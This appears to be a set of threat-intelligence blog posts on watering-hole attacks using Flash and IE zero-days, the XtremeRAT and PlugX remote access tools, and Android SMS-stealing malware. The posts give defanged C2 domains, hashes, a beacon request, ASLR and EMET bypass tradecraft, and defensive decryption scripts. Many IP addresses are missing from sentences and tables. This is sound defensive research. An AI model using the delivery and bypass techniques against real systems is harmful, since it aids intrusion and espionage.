The group behind this campaign appears to have sufficient resources (such as access to zero-day exploits) and a determination to infect visitors to foreign and public policy websites. The threat actors likely sought to infect users to these sites for follow-on data theft, including information related to defense and public policy matters.


On Feb. 13, FireEye identified a zero-day Adobe Flash exploit that affects the latest version of the Flash Player ( and 11.7.700.261). Visitors to the Peter G. Peterson Institute for International Economics (www.piie[.]com) were redirected to an exploit server hosting this Flash zero-day through a hidden iframe.

We subsequently found that the American Research Center in Egypt (www.arce[.]org) and the Smith Richardson Foundation (www.srf[.]org) also redirected visitors to the exploit server. All three organizations are nonprofit institutions; the Peterson Institute and Smith Richardson Foundation engage in national security and public policy issues.


To bypass Windows’ Address Space Layout Randomization (ASLR) protections, this exploit targets computers with any of the following configurations:

  • Windows XP
  • Windows 7 and Java 1.6
  • Windows 7 and an out-of-date version of Microsoft Office 2007 or 2010

Users can mitigate the threat by upgrading from Windows XP and updating Java and Office. If you have Java 1.6, update Java to the latest 1.7 version. If you are using an out-of-date Microsoft Office 2007 or 2010, update Microsoft Office to the latest version.

These mitigations do not patch the underlying vulnerability. But by breaking the exploit’s ASLR-bypass measures, they do prevent the current in-the-wild exploit from functioning.

Vulnerability analysis

GreedyWonk targets a previously unknown vulnerability in Adobe Flash. The vulnerability permits an attacker to overwrite the vftable pointer of a Flash object to redirect code execution.

ASLR bypass

The attack uses only known ASLR bypasses. Details of these techniques are available from our previous blog post on the subject (in the “Non-ASLR modules” section).

For Windows XP, the attackers build a return-oriented programming (ROP) chain of MSVCRT (Visual C runtime) gadgets with hard-coded base addresses for English (“en”) and Chinese (“zh-cn” and “zh-tw”).

On Windows 7, the attackers use a hard-coded ROP chain for MSVCR71.dll (Visual C++ runtime) if the user has Java 1.6, and a hard-coded ROP chain for HXDS.dll (Help Data Services Module) if the user has Microsoft Office 2007 or 2010.

Java 1.6 is no longer supported and does not receive security updates. In addition to the MSVCR71.dll ASLR bypass, a variety of widely exploited code-execution vulnerabilities exist in Java 1.6. That’s why FireEye strongly recommends upgrading to Java 1.7.

The Microsoft Office HXDS.dll ASLR bypass was patched at the end of 2013. More details about this bypass are addressed by Microsoft’s Security Bulletin MS13-106 and an accompanying blog entry. FireEye strongly recommends updating Microsoft Office 2007 and 2010 with the latest patches.

Shellcode analysis

The shellcode is downloaded in ActionScript as a GIF image. Once the ROP chain marks the shellcode as executable using Windows’ VirtualProtect function, the shellcode downloads an executable via the InternetOpenUrlA and InternetReadFile functions, writes the file to disk with CreateFileA and WriteFile, and finally runs it using the WinExec function.

PlugX/Kaba payload analysis

Once the exploit succeeds, a PlugX/Kaba remote access tool (RAT) payload with the MD5 hash 507aed81e3106da8c50efb3a045c5e2b is installed on the compromised endpoint. This PlugX sample was compiled on Feb. 12, one day before we first observed it, indicating that it was deployed specifically for this campaign.

This PlugX payload was configured with the following command-and-control (CnC) domains:

  • java.ns1[.]name
  • wmi.ns01[.]us

Sample callback traffic was as follows:

POST /D28419029043311C6F8BF9F5 HTTP/1.1
Accept: */*
HHV1: 0
HHV2: 0
HHV3: 61456
HHV4: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Campaign analysis

Both java.ns1[.]name and[.]org resolved to on Feb. 18, 2014. Passive DNS analysis reveals that the domain previously resolved to between July 4, 2013 and July 15, 2013 and on Feb. 17, 2014.  java.ns1[.]name also resolved to on February 18.

Domain               First Seen  Last Seen   IP Address
[.]org               2014-02-18  2014-02-19
java.ns1[.]name      2014-02-18  2014-02-19
java.ns1[.]name      2014-02-18  2014-02-18
wmi.ns01[.]us        2014-02-17  2014-02-17
proxy.ddns[.]info    2013-05-02  2014-02-18
updatedns.ns02[.]us  2013-09-06  2013-09-06
updatedns.ns01[.]us  2013-09-06  2013-09-06
wmi.ns01[.]us        2013-07-04  2013-07-15


MD5 Family Compile Time Alternate C2s
7995a9a6a889b914e208eb924e459ebc  PlugX       2012-06-09  fuckchina.govnb[.]com
bf60b8d26bc0c94dda2e3471de6ec977  PlugX       2010-03-15  [.]org
fd69793bd63c44bbb22f9c4d46873252  Poison Ivy  2013-03-07  N/A
88b375e3b5c50a3e6c881bc96c926928  Poison Ivy  2012-06-11  N/A
cd07a9e49b1f909e1bd9e39a7a6e56b4  Poison Ivy  2012-06-11  N/A

The Poison Ivy variants that connected to the domain wmi.ns01[.]us had the following unique configuration properties:

Domain First Seen Last Seen IP Address
fuckchina.govnb[.]com  2013-12-11  2013-12-11
[.]org                 2014-02-12  2014-02-12
[.]org                 2013-12-04  2013-12-04

We found a related Poison Ivy sample (MD5 8936c87a08ffa56d19fdb87588e35952) with the same “java7” password, which was dropped by an Adobe Flash exploit (CVE-2012-0779). In this previous incident, visitors to the website of the Center for Defense Information (www.cdi[.]org), also an organization involved in defense matters, were redirected to an exploit server at

This exploit server hosted a Flash exploit file named BrightBalls.swf (MD5 1ec5141051776ec9092db92050192758). This exploit, in turn, dropped the Poison Ivy variant. In addition to using the same password “java7,” this variant was configured with a mutex following a similar pattern, “YFds*&^ff”, and connected to a CnC server at windows.ddns[.]us.

Using passive DNS analysis, we see the domains windows.ddns[.]us and wmi.ns01[.]us both resolved to in mid-2012.

Domain  First Seen  Last Seen   IP Address
        2012-07-07  2012-09-19
        2012-05-23  2012-06-10

During another earlier compromise of the same website, visitors were redirected to a Java exploit test.jar (MD5 7d810e3564c4eb95bcb3d11ce191208e). This jar file exploited CVE-2012-0507 and dropped a Poison Ivy payload with the hash (MD5 52aa791a524b61b129344f10b4712f52). This Poison Ivy variant connected to a CnC server at ids.ns01[.]us. The domain ids.ns01[.]us also overlaps with the domain wmi.ns01[.]us on the IP

Domain First Seen Last Seen IP Address
wmi.ns01[.]us  2012-07-03  2012-07-04
ids.ns01[.]us  2012-04-23  2012-05-18

The Poison Ivy sample referenced above (MD5 fd69793bd63c44bbb22f9c4d46873252) was delivered via an exploit chain that began with a redirect from the Center for European Policy Studies (www.ceps[.]be). In this case, visitors were redirected from www.ceps[.]be to a Java exploit hosted on shop.fujifilm[.]be.

In what is certainly not a coincidence, we also observed www.arce[.]org (one of the sites redirecting to the current Flash exploit) also redirect visitors to the Java exploit on shop.fujifilm[.]be in 2013.



This threat actor clearly seeks out and compromises websites of organizations related to international security policy, defense topics, and other non-profit sociocultural issues. The actor either maintains persistence on these sites for extended periods of time or is able to re-compromise them periodically.

This actor also has early access to a number of zero-day exploits, including Flash and Java, and deploys a variety of malware families on compromised systems. Based on these and other observations, we conclude that this actor has the tradecraft abilities and resources to remain a credible threat in at least the mid-term.

XtremeRAT: Nuisance or Threat?

Rather than building custom malware, many threat actors behind targeted attacks use publicly or commercially available remote access Trojans (RATs). This pre-built malware has all the functionality needed to conduct cyber espionage and is controlled directly by humans, who have the ability to adapt to network defenses. As a result, the threat posed by these RATs should not be underestimated.

However, it is difficult to distinguish and correlate the activity of targeted threat actors based solely on their preference to use particular malware — especially, freely available malware. From an analyst’s perspective, it is unclear whether these actors choose to use this type of malware simply out of convenience or in a deliberate effort to blend in with traditional cybercrime groups, who also use these same tools.

There are numerous RATs available for free and for purchase in online forums, chat rooms, and marketplaces on the Internet. Most RATs are easy to use and thus attract novices. They are used for a variety of criminal activity, including “sextortion”. [1] The ubiquity of these RATs makes it difficult to determine whether a particular security incident is related to a targeted threat, cybercrime, or just a novice “script kiddie” causing a nuisance.

Although publicly available RATs are used by a variety of operators with different intents, the activity of particular threat actors can still be tracked by clustering command and control server information as well as the information that is set by the operators in the builder. These technical indicators, combined with context of an incident (such as the timing, specificity and human activity) allow analysts to assess the targeted or non-targeted nature of the threat.

In this post, we examine a publicly available RAT known as XtremeRAT. This malware has been used in targeted attacks as well as traditional cybercrime. During our investigation we found that the majority of XtremeRAT activity is associated with spam campaigns that typically distribute Zeus variants and other banking-focused malware. Why have these traditional cybercrime operators begun to distribute RATs? This seems odd, considering RATs require manual labor as opposed to automated banking Trojans.

Based on our observations we propose one or more of the following possible explanations:

  1. Smokescreen
    The operations may be part of a targeted attack that seeks to disguise itself and its possible targets, by using spam services to launch the attacks.
  2. Less traditional tools available
    With more crimeware author arrests and/or disappearance of a number of banking Trojan developers, cybercriminals are resorting to using RATs to manually steal data, such as banking and credit card details. [2]
  3. Complicated defenses require more versatile tools
    As many traditional banking and financial institutions have improved their security practices, perhaps attackers have had a much more difficult time developing automation in their Trojans to cover all variations of these defenses; as such, RATs provide more versatility and effectiveness, at the expense of scalability.
  4. Casting a wider net
    After compromising indiscriminate targets, attackers may dig deeper into specific targets of interest and/or sell off the access rights of the victims’ systems and their data to others.

These possible explanations are not mutually exclusive. One or all of them may be factors in explaining this observed activity.


XtremeRAT was developed by “xtremecoder” and has been available since at least 2010. Written in Delphi, XtremeRAT shares code with several other Delphi RAT projects, including SpyNet, CyberGate, and Cerberus. The RAT is available for free; however, the developer charges 350 Euros for the source code. Unfortunately for xtremecoder, the source code has been leaked online. The current version is Xtreme 3.6, but a variety of “private” versions of this RAT are available as well. As such, the official version of this RAT and its many variants are used by a wide variety of actors.

XtremeRAT allows an attacker to:

  • Interact with the victim via a remote shell
  • Upload/download files
  • Interact with the registry
  • Manipulate running processes and services
  • Capture images of the desktop
  • Record from connected devices, such as a webcam or microphone

Moreover, during the build process, the attacker can specify whether to include keylogging and USB infection functions.

Extracting Intelligence

XtremeRAT contains two components: a “client” and a “server”; however, from the attacker’s perspective, these terms have reversed meanings. Specifically, according to the author, the “server” component is the malware that resides on victim endpoints that connect to the “client”, which is operated by the attacker from one or more remote command-and-control (CnC) systems. Due to this confusing and overloaded terminology, we refer to the “server” as a “backdoor” on the victim and the “client” as a remote “controller” operated by the attacker.

XtremeRAT backdoors maintain and reference configuration data that was chosen by the attacker at the time they were built. This data can contain very useful hints to help group attacks and attribute them to actors, similar to what we have previously described in our Poison Ivy whitepaper. [3]

Several versions of XtremeRAT write this configuration data to disk under %APPDATA%\Microsoft\Windows, either directly, or to a directory named after mutex configured by the attacker. When written to disk, the data is RC4 encrypted with a key of either "CYBERGATEPASS" or "CONFIG" for the versions we have analyzed. In both cases, the key is Unicode. The config file has either a “.nfo” or ".cfg" extension depending on the version. XtremeRAT's key scheduling algorithm (KSA) implementation contains a bug wherein it only considers the length of the key string, not including the null bytes between each character, as is found in these Unicode strings. As a result, it only effectively uses the first half of the key. For example, the key “C\x00O\x00N\x00F\x00I\x00G\x00” is 12 bytes long, but the length is calculated as only being 6 bytes long. Because of this, the key that is ultimately used is “C\x00O\x00N\x00”.
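The effect of the key-length bug is easy to reproduce with a standard RC4 KSA plus the buggy length calculation (Python sketch; this is our reconstruction of the behavior described above, not the decompiled code):

```python
# XtremeRAT's KSA measures the key as a character count, so for a Unicode
# (UTF-16LE) key buffer only the first half of the bytes is ever scheduled.

def rc4_ksa(key: bytes) -> list:
    """Standard RC4 key scheduling over the given key bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S

def effective_key(unicode_key: bytes) -> bytes:
    # Bug: length counted in characters (bytes // 2) but applied to the raw
    # byte buffer, so only the first half of the key bytes is used.
    return unicode_key[: len(unicode_key) // 2]

key = "CONFIG".encode("utf-16-le")   # b'C\x00O\x00N\x00F\x00I\x00G\x00'
print(effective_key(key))            # b'C\x00O\x00N\x00'
```

Scheduling `effective_key(key)` rather than the full key is what makes the on-disk config decryptable with the truncated key “C\x00O\x00N\x00”.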

The configuration data includes:

  • Name of the installed backdoor file
  • Directory under which the backdoor file is installed
  • Which process it will inject into (if specified)
  • CnC information
  • FTP information for sending stolen keystroke data
  • Mutex name of the master process
  • ID and group name, which are used by the actors for organizational purposes

Because the decrypted configuration data can be reliably located in memory (with only slight variations in its structure from version to version) and because not all versions of XtremeRAT will write their configuration data to disk, parsing memory dumps of infected systems is often the ideal method for extracting intelligence.

We are releasing Python scripts we have developed to gather the configuration details for various versions of XtremeRAT from both process memory dumps and the encrypted configuration file on disk. The scripts are available at

Also included in this toolset is a script that decrypts and prints the contents of the log file created by XtremeRAT containing victim keystroke data. This log file is written to the same directory as the config file and has a “.dat” extension. Curiously, this log file is encrypted with a simple two-byte XOR instead of RC4. Later in this blog, we will share some of the configuration details we have extracted during our subsequent analysis.
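The keystroke log decryption described above amounts to a repeating two-byte XOR. A minimal sketch, assuming a placeholder key (the actual two-byte value varies and must be recovered from the sample, as our released script does):

```python
# Sketch of decrypting the XtremeRAT ".dat" keystroke log: the file is
# encrypted with a simple repeating two-byte XOR rather than RC4.
# The key below is a hypothetical placeholder, not a real sample's key.

def xor2(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating two-byte key (symmetric operation)."""
    assert len(key) == 2
    return bytes(b ^ key[i % 2] for i, b in enumerate(data))

key = b"\x3d\x7a"                       # placeholder two-byte key
ciphertext = xor2(b"victim keystrokes", key)
assert xor2(ciphertext, key) == b"victim keystrokes"   # round trip
```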

XtremeRAT Activity

Using telemetry from the FireEye Dynamic Threat Intelligence (DTI) cloud, we examined 165 XtremeRAT samples from attacks that primarily hit the following sectors:

  • Energy, utilities, and petroleum refining
  • Financial Services
  • High-tech

These incidents span a spectrum that includes targeted attacks as well as indiscriminate attacks. Among these XtremeRAT-based attacks, we found that 4 of the 165 samples were used in targeted attacks against the high-tech sector by threat actors we have called “Molerats”. [4]

Operation Molerats

In 2012, XtremeRAT was used against a variety of governments as well as Israeli and Palestinian targets in what was known as Operation Molerats (the same attackers have also used variants of the Poison Ivy RAT). [5] Upon executing one particular sample (45142b17abd8a17a5e38305b718f3415), the malware beacons to “” and “”. In this particular case, the attacker used XtremeRAT 2.9 within a self-extracting archive that also presents a decoy document to the victim, where the decoy content appears to have been copied from a website.

[caption id="attachment_4467" align="alignnone" width="849"]Figure 1. Contents of SFX archive containing XtremeRAT[/caption]

[caption id="attachment_4470" align="alignnone" width="623"]Figure 2. SFX settings inside malicious archive[/caption]

[caption id="attachment_4472" align="alignnone" width="675"]Figure 3. Decoy content presented in malicious archive[/caption]

Figure 4 shows the controller the attacker uses to interact with systems compromised with XtremeRAT. In this case, it appears the actor used the ID field to record the type of attack delivered (docx) and the Group field was used to record a “campaign code” (IDF), which helps the actor keep track of the set of victims that were attacked during this campaign.

[caption id="attachment_4474" align="alignnone" width="900"]Figure 4. XtremeRAT controller GUI[/caption]

The attacker modified the highlighted information at build time. By default, the XtremeRAT controller sets the ID field as “Server” and Group field as “Servers”, with the default password used to authenticate, connect, and control a compromised endpoint as “1234567890”.

[caption id="attachment_4475" align="alignnone" width="900"]Figure 5. XtremeRAT controller connection settings[/caption]

In Figure 5, the attacker specified custom CnC servers and ports, changed the default password to “1411”, and changed the default process mutex name.

[caption id="attachment_4476" align="alignnone" width="900"]Figure 6. XtremeRAT install settings[/caption]

By default, the controller assigns a process mutex name of “--((Mutex))--”; the attackers changed it to “fdgdfdg”. These indicators, along with the command-and-control domain names and the IP addresses they resolve to, can be used to cluster and track this activity over time.

[caption id="attachment_4477" align="alignnone" width="900"]Figure 7. Molerats cluster analysis[/caption]

Figure 7 shows a cluster of Molerats activity. In addition to the password “1411”, the attackers also used the password “12345000”. Combining passive DNS data with configuration information extracted from XtremeRAT is a simple way to track the activity of these actors.

Spam Activity

The vast majority of XtremeRAT activity clustered around the default password “1234567890” (116 samples). There was overlap between this large cluster and the second largest one which used the password “123456” (12 samples). The activity in these two clusters aligns with indicators observed in Spanish language spam runs. The “123456” cluster also contains spam in the English language, leveraging the recent tragedy in Kenya as a lure. [7]

The Uranio Cluster

In our sample set, we have 28 malware samples that connect to a set of sequentially numbered command and control servers:


The malware is being spammed out and has file names such as:

  • Certificaciones De Pagos Nominas Parafiscales jpg 125420215 58644745574455 .exe
  • Soportes de pagos  certificaciones y documentos mes mayo 30 2013 567888885432235678888888123456.exe
  • Certificaciones De Pago Y Para Fiscales.exe

We extracted the configurations for a sampling of the XtremeRAT samples we came across in this spam run and found the following results:

MD5 | ID | Group | Version | Mutex
a6135a6a6346a460792ce2da285778b1 | ABRIL | CmetaS3 | 3.6 Private | C5AapWKh
988babfeec5111d45d7d7eddea6daf28 | ABRIL | CmetaS3 | 3.6 Private | C5AapWKh
715f54a077802a0d67e6e7136bcbe340 | ABRIL | CmetaS3 | 3.6 Private | C5AapWKh
167496763aa8d369ff482c4e2ca3da7d | ABRIL | CmetaS3 | 3.6 Private | C5AapWKh
3f288dfa95d90a3cb4503dc5f3d49c16 | Server | Cometa4 | 3.6 Private | 4QtgfoP
6a8057322e62c569924ea034508068c9 | Server | Platino4 | 3.6 Private | mbojnXS
37b90673aa83d177767d6289c4b90468 | Server | Platino4 | 3.6 Private | mbojnXS
98fb1014f6e90290da946fdbca583334 | Server | Platino8 | 3.6 Private | G7fjZQYAH
5a9547b727f0b4baf9b379328c797005 | Server | Platino8 | 3.6 Private | G7fjZQYAH
fb98c8406e316efb0f46024f7c6a6739 | Server | Platino9 | 3.6 Private | kUHwdc8Y
64f6f819a029956b8aeafb729512b460 | Server | Uranio | 3.6 Private | eYwJ6QX0i
a4c47256a7159f9556375c603647f4c2 | Mayo | Uranio2011 | 3.6 Private | 0pg6ooH
62d6e190dcc23e838e11f449c8f9b723 | Mayo | Uranio2011 | 3.6 Private | 0pg6ooH
d5d99497ebb72f574c9429ecd388a019 | Mayo | Uranio2011 | 3.6 Private | 0pg6ooH
3a9237deaf25851f2511e355f8c506d7 | Server | Uranio3 | | QwcgY0a
c5e95336d52f94772cbdb2a37cef1d33 | Server | Uranio3 | | QwcgY0a
0ea60a5d4c8c629c98726cd3985b63c8 | Server | Uranio4 | | xjUfrQHP6Xy
41889ca19c18ac59d227590eeb1da214 | Server | Uranio4 | | xjUfrQHP6Xy
90e11bdbc380c88244bb0152f1142aff | Server | Uranio4 | | xjUfrQHP6Xy
c1ad4445f1064195de1d6756950e2ae9 | Server | Uranio5 | 3.6 Private | R9lmAhUK
e5b781ec77472d8d4b3b4a4d2faf5761 | Server | Uranio6 | 3.6 Private | KdXTsbjJ6
a921aa35deedf09fabee767824fd8f7e | Server | Uranio6 | 3.6 Private | KdXTsbjJ6
9a2e510de8a515c9b73efdf3b141f6c2 | CC | Uranio7 | 3.6 Private | UBt3eQq0
a6b862f636f625af2abcf5d2edb8aca2 | CC | Uranio7 | 3.6 Private | iodjmGyP3
0327859be30fe6a559f28af0f4f603fe | CC | Uranio7 | 3.6 Private | UBt3eQq0

“Server”, “Servers”, and “--((Mutex))--” are the defaults in the XtremeRAT controller for ID, Group, and Mutex respectively. The random mutex names in the table above can be generated by double-clicking in the Mutex field within the controller. In most cases, the number at the end of the group label is the same number used at the end of the subdomain for the CnC. In the case of “Uranio2011”, the subdomain is simply “uranio” and 2011 represents the port number used to communicate with the CnC infrastructure.

[caption id="attachment_4478" align="alignnone" width="900"]Figure 8. Portuguese version of XtremeRAT controller[/caption]

Uranio Sinkhole Analysis

We operated a sinkhole between November 22, 2013 and January 6, 2014. During that time, 12,000 unique IPs connected to the sinkhole. Recall that this number reflects only one of many command and control servers. [8]

However, estimating the number of victims this way is difficult due to DHCP lease times, which inflate the numbers, and NAT connections, which deflate the numbers. [9] As such, we counted the unique IP addresses that connected to the sinkhole on each day. The highest number of connections to this sinkhole was on Dec. 3, 2013 with 2003 connections and the lowest was Jan. 6, 2014 with 109 connections. The average number of unique IP addresses that connected to the sinkhole per day was 657.
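The daily counts above come down to grouping sinkhole connections by calendar day and counting distinct source IPs. A minimal sketch, assuming a hypothetical "timestamp,ip" log line format (our actual sinkhole log format differs):

```python
# Count distinct source IPs per day from sinkhole logs.
# Log format here is a hypothetical "ISO-timestamp,ip" CSV line.
from collections import defaultdict

def unique_ips_per_day(lines):
    days = defaultdict(set)
    for line in lines:
        ts, ip = line.strip().split(",")
        day = ts.split("T")[0]          # keep the date part of the ISO timestamp
        days[day].add(ip)               # a set deduplicates repeat connections
    return {day: len(ips) for day, ips in days.items()}

log = [
    "2013-12-03T10:00:01,198.51.100.7",
    "2013-12-03T10:05:09,198.51.100.7",   # same IP, same day: counted once
    "2013-12-03T11:42:53,203.0.113.9",
    "2013-12-04T09:13:37,198.51.100.7",
]
assert unique_ips_per_day(log) == {"2013-12-03": 2, "2013-12-04": 1}
```

Per-day deduplication is what limits, but does not eliminate, the DHCP and NAT distortions described above.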

While these IP addresses were in ranges assigned to 40 distinct countries, the vast majority of the connections to the sinkhole (92.7 percent) were from Colombia. Argentina was a distant second with 1.22 percent, followed by Venezuela with 1.02 percent, Egypt with 0.95 percent and the U.S. with 0.9 percent.


Determining the activity of targeted threat actors is difficult. Most of the activity associated with publicly available RATs is traditional cybercrime associated with spam runs, banking Trojans and malware distribution. However, useful indicators can be extracted from these ubiquitous RATs to track the activities of targeted threat actors (as well as cybercrime).




2. The group behind the Carberp banking Trojan was arrested, the author of Zeus retired, the author of SpyEye went into hiding and was recently arrested, and the FBI and Microsoft have gone after Citadel, which is now off the market. See also an overview of the “Big 4” banking Trojans.

3. /content/dam/legacy/resources/pdfs/fireeye-poison-ivy-report.pdf





8. We filtered out all non-XtremeRAT traffic and ensured that each of the 12,000 IPs attempted to make an XtremeRAT connection.


Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website

On February 11, FireEye identified a zero-day exploit (CVE-2014-0322) being served up from the U.S. Veterans of Foreign Wars’ website (vfw[.]org). We believe the attack is a strategic Web compromise targeting American military personnel amid a paralyzing snowstorm at the U.S. Capitol in the days leading up to the Presidents Day holiday weekend. Based on infrastructure overlaps and tradecraft similarities, we believe the actors behind this campaign are associated with two previously identified campaigns (Operation DeputyDog and Operation Ephemeral Hydra).

This blog post examines the vulnerability and associated attacks, which we have dubbed “Operation SnowMan."

Exploit/Delivery analysis

After compromising the VFW website, the attackers added an iframe into the beginning of the website’s HTML code that loads the attacker’s page in the background. The attacker’s HTML/JavaScript page runs a Flash object, which orchestrates the remainder of the exploit. The exploit includes calling back to the IE 10 vulnerability trigger, which is embedded in the JavaScript. Specifically, visitors to the VFW website were silently redirected through an iframe to the exploit at www.[REDACTED].com/Data/img/img.html.


The exploit targets IE 10 with Adobe Flash. It aborts exploitation if the user is browsing with a different version of IE or has installed Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). So installing EMET or updating to IE 11 prevents this exploit from functioning.

Vulnerability analysis

The vulnerability is a previously unknown use-after-free bug in Microsoft Internet Explorer 10. The vulnerability allows the attacker to modify one byte of memory at an arbitrary address. The attacker uses the vulnerability to do the following:

  • Gain access to memory from Flash ActionScript, bypassing address space layout randomization (ASLR)
  • Pivot to a return-oriented programing (ROP) exploit technique to bypass data execution prevention (DEP)

EMET detection

The attacker uses the Microsoft.XMLDOM ActiveX control to load a one-line XML string containing a file path to the EMET DLL. The exploit code then parses the error resulting from the XML load to determine whether the load failed because the EMET DLL is not present. The exploit proceeds only if this check determines that the EMET DLL is not present.

ASLR bypass

Because the vulnerability allows attackers to modify memory to an arbitrary address, the attacker can use it to bypass ASLR. For example, the attacker corrupts a Flash Vector object and then accesses the corrupted object from within Flash to access memory. We have discussed this technique and other ASLR bypass approaches in our blog. One minor difference between the previous approaches and this attack is the heap spray address, which was changed to 0x1a1b2000 in this exploit.

Code execution

Once the attacker’s code has full memory access through the corrupted Flash Vector object, it searches the loaded libraries for ROP gadgets by scanning their machine code. The attacker then overwrites the vftable pointer of a flash.Media.Sound() object in memory to point to the pivot and begin ROP. After successful exploitation, the code repairs the corrupted Flash Vector and flash.Media.Sound to continue execution.

Shellcode analysis

Subsequently, the malicious Flash code downloads a file containing the dropped malware payload. The beginning of the file is a JPG image; the end of the file (offset 36321) is the payload, encoded with an XOR key of 0x95. The attacker appends the payload to the shellcode before pivoting to code control. Then, when the shellcode is executed, the malware creates files “sqlrenew.txt” and “stream.exe”. The tail of the image file is decoded, and written to these files. “sqlrenew.txt” is then executed with the LoadLibraryA Windows API call.
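Recovering the dropped payload from the downloaded file is straightforward given the details above: skip the JPG data up to offset 36321 and undo the single-byte XOR. A minimal carving sketch (the synthetic input here is illustrative, not a real sample):

```python
# Carve the malware payload appended to the JPG: everything from
# offset 36321 onward, XOR-encoded with the single byte 0x95.

OFFSET = 36321
KEY = 0x95

def carve_payload(blob: bytes) -> bytes:
    """Return the decoded payload appended after the JPG data."""
    return bytes(b ^ KEY for b in blob[OFFSET:])

# Synthetic example: fake JPG padding followed by an encoded payload.
payload = b"MZ\x90\x00fake-payload"
blob = b"\xff" * OFFSET + bytes(b ^ KEY for b in payload)
assert carve_payload(blob) == payload
```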

ZxShell payload analysis

As documented above, this exploit dropped an XOR (0x95) payload that executed a ZxShell backdoor (MD5: 8455bbb9a210ce603a1b646b0d951bce). The compile date of the payload was 2014-02-11, and the last modified date of the exploit code was also 2014-02-11. This suggests that this instantiation of the exploit was very recent and was deployed for this specific strategic Web compromise of the Veterans of Foreign Wars website. A possible objective in the SnowMan attack is targeting military service members to steal military intelligence. In addition to retirees, active military personnel use the VFW website. It is probably no coincidence that Monday, Feb. 17, is a U.S. holiday, and much of the U.S. Capitol shut down Thursday amid a severe winter storm.

The ZxShell backdoor is a widely used and publicly available tool leveraged by multiple threat actors linked to cyber espionage operations. This particular variant called back to a command and control server located at newss[.]effers[.]com. This domain currently resolves to an IP address to which the domain info[.]flnet[.]org also resolved on 2014-02-12.

Infrastructure analysis

The info[.]flnet[.]org domain overlaps with icybin[.]flnet[.]org and book[.]flnet[.]org via the previous resolutions to the following IP addresses:

First Seen | Last Seen | CnC Domain | IP
2013-08-31 | 2013-08-31 | icybin.flnet[.]org |
2013-05-02 | 2013-08-02 | info.flnet[.]org |
2013-08-02 | 2013-08-02 | book.flnet[.]org |
2013-08-10 | 2013-08-10 | info.flnet[.]org |
2013-07-15 | 2013-07-15 | icybin.flnet[.]org |
2014-01-02 | 2014-01-02 | book.flnet[.]org |
2013-12-03 | 2014-01-02 | info.flnet[.]org |

We previously observed Gh0stRat samples with the custom packet flag “HTTPS” calling back to book[.]flnet[.]org and icybin[.]flnet[.]org. The threat actor responsible for Operation DeputyDog also used the “HTTPS” version of Gh0st. We also observed another “HTTPS” Gh0st variant connecting to a related command and control server at me[.]scieron[.]com.

MD5 Hash | CnC Domain
758886e58f9ea2ff22b57cbbb015166e | book.flnet[.]org
0294f9280491f85d898ebe471f0fb58e | icybin.flnet[.]org
9d20566a327076b7152bbf9ed20292c4 | me.scieron[.]com

The me[.]scieron[.]com domain previously resolved to an IP address in the same /24 subnet as addresses to which book[.]flnet[.]org previously resolved.

Other domains seen resolving to this same /24 subnet were dll[.]freshdns[.]org, ali[.]blankchair[.]com, and cht[.]blankchair[.]com. Both ali[.]blankchair[.]com and cht[.]blankchair[.]com resolved to the same IP address.

First Seen | Last Seen | CnC Domain | IP
2012-11-12 | 2012-11-28 | me.scieron[.]com |
2012-04-09 | 2012-10-24 | cht.blankchair[.]com |
2012-04-09 | 2012-09-18 | ali.blankchair[.]com |
2012-11-08 | 2012-11-25 | dll.freshdns[.]org |
2012-11-23 | 2012-11-27 | rt.blankchair[.]com |
2012-05-29 | 2012-06-28 | book.flnet[.]org |

A number of other related domains resolve to these IPs and to other IPs also in this /24 subnet. For the purposes of this blog, we’ve chosen to focus on those domains and IPs that relate to the previously discussed DeputyDog and Ephemeral Hydra campaigns.

You may recall that dll[.]freshdns[.]org, ali[.]blankchair[.]com and cht[.]blankchair[.]com were all linked to both Operation DeputyDog and Operation Ephemeral Hydra. Figure 1 illustrates the infrastructure overlaps and connections we observed between the strategic Web compromise campaign leveraging the VFW’s website, the DeputyDog, and the Ephemeral Hydra operations.

Figure 1: Ties between Operation SnowMan, DeputyDog, and Ephemeral Hydra

Links to DeputyDog and Ephemeral Hydra

Other tradecraft similarities between the actor(s) responsible for this campaign and the actor(s) responsible for the DeputyDog/Ephemeral Hydra campaigns include:

  • The use of zero-day exploits to deliver a remote access Trojan (RAT)
  • The use of strategic web compromise as a vector to distribute remote access Trojans
  • The use of a simple single-byte XOR encoded (0x95) payload obfuscated with a .jpg extension
  • The use of Gh0stRat with the “HTTPS” packet flag
  • The use of related command-and-control (CnC) infrastructure during the similar time frames

We observed many similarities from the exploitation side as well. At a high level, this attack and the CVE-2013-3163 attack both leveraged a Flash file that orchestrated the exploit and would call back into IE JavaScript to trigger an IE flaw. The code within the Flash files from each attack is extremely similar. They build ROP chains and shellcode the same way, both choose to corrupt a Flash Vector object, have some identical functions with common typos, and even share the same name.


These actors have previously targeted a number of different industries, including:

  • U.S. government entities
  • Japanese firms
  • Defense industrial base (DIB) companies
  • Law firms
  • Information technology (IT) companies
  • Mining companies
  • Non-governmental organizations (NGOs)

The proven ability to successfully deploy a number of different private and public RATs using zero-day exploits against high-profile targets likely indicates that this actor(s) will continue to operate in the mid to long-term.

Android.HeHe: Malware Now Disconnects Phone Calls

FireEye Labs has recently discovered six variants of a new Android threat that steals text messages and intercepts phone calls. We named this sample set “Android.HeHe” after the name of the activity that is used consistently across all samples.

Here is a list of known bot variants:

MD5 | VirusTotal Detection Ratio
1caa31272daabb43180e079bca5e23c1 | 2/48
8265041aca378d37006799975fa471d9 | 1/47
2af4de1df7587fa0035dcefededaedae | 2/45
2b41fbfb5087f521be193d8c1f5efb4c | 2/46
aa0ed04426562df25916ff70258daf6c | 1/46
9507f93d9a64d718682c0871bf354e6f | 1/47


The app disguises itself as “android security” (Figure 1), attempting to provide users with what is advertised as an OS update. It contacts the command-and-control (CnC) server to register itself, then goes on to monitor incoming SMS messages. The CnC is expected to respond with a list of phone numbers that are of interest to the malware author. If one of these numbers sends an SMS or makes a call to an infected device, the malware intercepts the message or call, suppresses the notification on the device, and removes any trace of the message or call from the device logs. Any SMS messages from one of these numbers are logged into an internal database and sent to the CnC server. Any phone calls from these numbers are silenced and rejected.

